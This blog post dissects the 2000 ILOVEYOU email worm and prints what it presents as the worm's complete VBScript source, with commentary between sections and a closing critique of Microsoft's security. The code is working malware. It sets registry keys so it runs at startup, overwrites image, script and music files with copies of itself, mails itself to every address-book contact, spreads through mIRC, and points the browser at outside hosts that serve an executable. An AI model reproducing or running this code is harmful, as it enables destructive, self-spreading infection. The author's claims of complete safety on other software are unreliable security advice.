Dissecting the worm

Sneaking in

On Thursday, May 4, 2000, a new worm has hit the net. It arrived in an e-mail with the subject “ILOVEYOU”. Within hours, mail servers were paralyzed, whole networks of PCs crashed (including those of many an administrative authority or bank).

The mail itself told you to open the attachment containing a love letter. The attachment’s name was “LOVE-LETTER-FOR-YOU.TXT.vbs”. Once opened, the mayhem started by changing your system settings, then sending the worm to new victims and finally killing off your most beloved image and music files.

Dissection

As already mentioned, the name of the attached file was “LOVE-LETTER-FOR-YOU.TXT.vbs”. The extension “.vbs” is the mark of an MS Visual Basic script. Following is the complete source code of the script (the preformatted passages).

rem barok -loveletter(vbe) <i hate go to school>
rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines

The head of the worm, containing some info about the author. On Friday, I had a sour laugh when reading in the newspapers that some “experts” “assume”, the “virus” originates from the Philippines and that it comes from a schoolboy. I am not much of an expert but it really doesn’t need one to be able to read those first two lines.

OTOH what obviously needs more than an “expert” is the ability to distinguish between a worm and a virus. “ILOVEYOU” is not a virus but a worm. Only a worm can spread to other computers without human aid.

On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell") rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"

When I got this mail, I instantly became suspicious. I downloaded the attachment from my IMAP server, and renamed the file by removing the .vbs extension. Then I opened it in Simpletext on a Mac (pretty similar to Windows Wordpad except that it won’t crash). By scrolling through the file, these lines with the changing of registry settings confirmed two things: first that I’ve got definitely something more than a love letter on my hands and second that it won’t run on anything else than Win9x & co. (neither MacOS nor Linux nor FreeBSD nor BeOS nor OS/2 uses a registry of this kind).

end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")

Great. Your most often used system files get neighbours with disturbingly similar names…

c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32",dirsystem&"\MSKernel32.vbs"
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL",dirwin&"\Win32DLL.vbs"

Even worse… through some rerouting in the registry, they even replace the original ones.

downread=""
downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download Directory")
if (downread="") then
downread="c:\"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe"
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe"
end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX",downread&"\WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank"

This section sets your Internet Explorer the way that at next startup, it’ll get you a program you wouldn’t really want to get – and when you got it, IE config is changed once again so you won’t even consider something’s happened.

end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"\")
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or
(ext="wsh") or (ext="sct") or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"\"&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if

This is maybe the meanest part of the procedure. All the pictures and music you’ve downloaded will be written over with the worm and when opened will recreate the worm on your Windows-based PC (even if you’ve already removed it from your system).

if (eq<>folderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini")
or (s="script.ini") or (s="mirc.hlp") then
set scriptini=fso.CreateTextFile(folderspec&"\script.ini")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script...
mIRC will corrupt, if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect
and will not run correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }"
scriptini.WriteLine "n2= /.dcc send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if

Obviously, the author of the worm has something against mIRC. Personal vendetta?

next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
sub spreadtoemail()
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
set regedit=CreateObject("WScript.Shell")
set out=WScript.CreateObject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a)
if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead)
if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
male.Send
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD"
end if
x=x+1
next
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
else
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
end if
next
Set out=Nothing
Set mapi=Nothing
end sub
sub html
On Error Resume Next

Above section is responsible for sending a mail (“male”) to every entry in your address book. With some large companies, it means thousands of new victims.

dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
dta1="<HTML><HEAD><TITLE>LOVELETTER - HTML<?-?TITLE>
<META NAME=@-@Generator@-@ CONTENT=@-@BAROK VBS - LOVELETTER@-@>"&vbcrlf& _
"<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-?
ispyder@mail.com ?-? @GRAMMERSoft Group ?-?
Manila, Philippines ?-? March 2000@-@>"&vbcrlf& _
"<META NAME=@-@Description@-@ CONTENT=@-@simple but i think this is good...@-@>"&vbcrlf& _"<?-?HEAD><BODY ONMOUSEOUT=@-@window.name=#-#main#-#
;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)
@-@ "&vbcrlf& _
"ONKEYDOWN=@-@window.name=#-#main#-#;window.open
(#-#LOVE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@
BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@>
"&vbcrlf& _

And that’s the letter the script sends to your acquintances (or business partners).

"<CENTER><p>This HTML file need ActiveX Control<?-?p>
<p>To Enable to read this HTML file<BR>- Please press
#-#YES#-# button to Enable ActiveX<?-?p>"&vbcrlf& _
"<?-?CENTER><MARQUEE LOOP=@-@infinite@-@ BGCOLOR=@-@
yellow@-@>----------z--------------------z----------
<?-?MARQUEE> "&vbcrlf& _
"<?-?BODY><?-?HTML>"&vbcrlf& _
"<SCRIPT language=@-@JScript@-@>"&vbcrlf& _
"<!--?-??-?"&vbcrlf& _
"if (window.screen){var wi=screen.availWidth;var
hi=screen.availHeight;window.moveTo(0,0);window.resizeTo
(wi,hi);}"&vbcrlf& _
"?-??-?-->"&vbcrlf& _
"<?-?SCRIPT>"&vbcrlf& _
"<SCRIPT LANGUAGE=@-@VBScript@-@>"&vbcrlf& _
"<!--"&vbcrlf& _
"on error resume next"&vbcrlf& _
"dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit
"&vbcrlf& _
"aw=1"&vbcrlf& _
"code="
dta2="set fso=CreateObject(@-@Scripting.FileSystemObject
@-@)"&vbcrlf& _
"set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _
"code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))
"&vbcrlf& _
"code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))
"&vbcrlf& _
"code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))
"&vbcrlf& _
"set wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf& _
"wri.write code4"&vbcrlf& _
"wri.close"&vbcrlf& _
"if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@))
then"&vbcrlf& _
"if (err.number=424) then"&vbcrlf& _
"aw=0"&vbcrlf& _
"end if"&vbcrlf& _
"if (aw=1) then"&vbcrlf& _
"document.write @-@ERROR: can#-#t initialize ActiveX@-@
"&vbcrlf& _
"window.close"&vbcrlf& _
"end if"&vbcrlf& _
"end if"&vbcrlf& _
"Set regedit = CreateObject(@-@WScript.Shell@-@)
"&vbcrlf& _
"regedit.RegWrite @-@HKEY_LOCAL_MACHINE^-^Software^
-^Microsoft^-^Windows^-^CurrentVersion^-^Run^-
^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@
"&vbcrlf& _
"?-??-?-->"&vbcrlf& _
"<?-?SCRIPT>"
dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'")
dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""")
dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/")
dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\")
dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'")
dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""")
dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/")
dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\")
set fso=CreateObject("Scripting.FileSystemObject")
set c=fso.OpenTextFile(WScript.ScriptFullName,1)
lines=Split(c.ReadAll,vbcrlf)
l1=ubound(lines)
for n=0 to ubound(lines)
lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr(91))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
lines(n)=replace(lines(n),"\",chr(37)+chr(45)+chr(37))
if (l1=n) then
lines(n)=chr(34)+lines(n)+chr(34)
else
lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _"
end if
next
set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM")
b.close
set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM",2)
d.write dt5
d.write join(lines,vbcrlf)
d.write vbcrlf
d.write dt6
d.close
end sub

That was it. A somewhat longish code but still shorter to read than to get rid of its results.

 

Conclusions

First of all, once again – as in the case of Melissa last year – the problem was limited to Microsoft-only platforms. Companies are speaking about damages in the amount of millions of dollars and they blame it on the – yet unknown – author. And next time Microsoft releases an even newer version of its Office, Windows or Internet Explorer products, these same companies will upgrade to it without asking themselves whether it’ll be really for their own good.

This blindness is simply amazing. After all, at its core, what caused Melissa to be able to spread so fast and uncontrollable? The answer is that it was a Microsoft Word macro – thanks to Microsoft, a virus can now be hiding in an innocent-looking document file, thus the ages-old advice to be careful with executable program files (extension “.exe”) won’t help much any more. Still, obviously not many people realized what it means that Melissa is limited to Microsoft Word only and that no other word processor program will get you infected through text documents.

The “love-worm” is in many ways similar. It doesn’t use a Word macro but a Visual Basic script, which is another exclusive feature of MS products. This worm needs a Windows operating system to be able to run at all, an MS Internet Explorer to get a program (see source code comments earlier on), and an MS Outlook (Express) to pass the worm on to other computers. By using an alternative OS, you’re completely safe. And even when using Windows, you’re relatively safe when using an alternative browser (e.g. Opera, Netscape Navigator) and an alternative e-mail client (e.g Netscape Messanger, StarMail).

So who is to blame? It’s just too easy to point a finger to the first hobbyist programmer who is still going to school. You really want to say he is to blame by abusing a security hole Microsoft advertently created? I personally could never understand what I would need ActiveX for, why is it good when every e-mail I open can run a visual basic script on my computer and why a text document needs executables (macros). Maybe it’s just my ignorance but I decided to use Lotus SmartSuite for office applications and Netscape Communicator for web-browsing and e-mail – and I haven’t caught a single virus in the last 5+ years. And that without any antivirus software.

And there is an even greater security hole in Windows itself, and this one nobody’s going to tell me Microsoft created inadvertently – I mean the standard setting of Win9x not displaying file extensions. Thus even a professional – when not fully concentrating – can fall for such a trick. Or you want to tell me that when you see a file with the ending “.txt” your very first thought is automatically “this Windows installation here hasn’t been adjusted to display file extensions, thus this .txt ending is rather suspicious” ?

In this case, “experts” told us once again to get an antivirus program. What for? Isn’t it obvious the worm slipped through all antivirus protection? Get rid of your unsafe applications rather and you’ll be able to sleep without having to worry about some viruses or worms destroying your data.

Leave a Comment

This site uses Akismet to reduce spam. Learn how your comment data is processed.